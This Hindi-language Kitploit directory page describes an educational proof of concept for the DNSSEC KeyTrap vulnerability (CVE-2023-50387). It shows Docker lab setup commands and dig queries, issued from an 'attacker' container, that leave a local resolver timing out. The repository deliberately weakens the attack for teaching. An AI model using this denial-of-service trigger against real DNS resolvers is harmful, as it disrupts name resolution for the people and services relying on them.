Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50387 — DNSSEC KeyTrap भेद्यता (CVE-2023-50387) के लिए शैक्षणिक प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें DNS रिज़ॉल्वरों पर एल्गोरिदमिक जटिलता हमलों को प्रदर्शित करने के लिए Docker-आधारित लैब वातावरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/knqyf263/cve-2023-50387
भेद्यता विश्लेषणशोषणनेटवर्क सुरक्षालर्निंग और शिक्षाDNS विश्लेषणलैब और अभ्यास
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

DNSSEC KeyTrap भेद्यता (CVE-2023-50387) के लिए शैक्षणिक प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें DNS रिज़ॉल्वरों पर एल्गोरिदमिक जटिलता हमलों को प्रदर्शित करने के लिए Docker-आधारित लैब वातावरण शामिल है।

रिपॉजिटरी देखें
451042 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50387

DNS में KeyTrap (CVE-2023-50387)

यह रिपॉजिटरी शैक्षणिक उद्देश्यों के लिए है। वास्तविक हमलों में उपयोग को रोकने के लिए कुंजियों और हस्ताक्षरों की संख्या जानबूझकर कम रखी गई है, और एक-दूसरे से टकराने वाली कुंजियाँ उत्पन्न करने के लिए एक स्क्रिप्ट शामिल नहीं है।

परीक्षण

network

PoC पर्यावरण स्थापित करना

root@kitploit:~
$ docker compose up --build

DNSSEC काम करता है इसकी पुष्टि करना

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

KeyTrap को ट्रिगर करना

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

संदर्भ

  • https://www.athene-center.de/en/keytrap
टूल डाउनलोड करें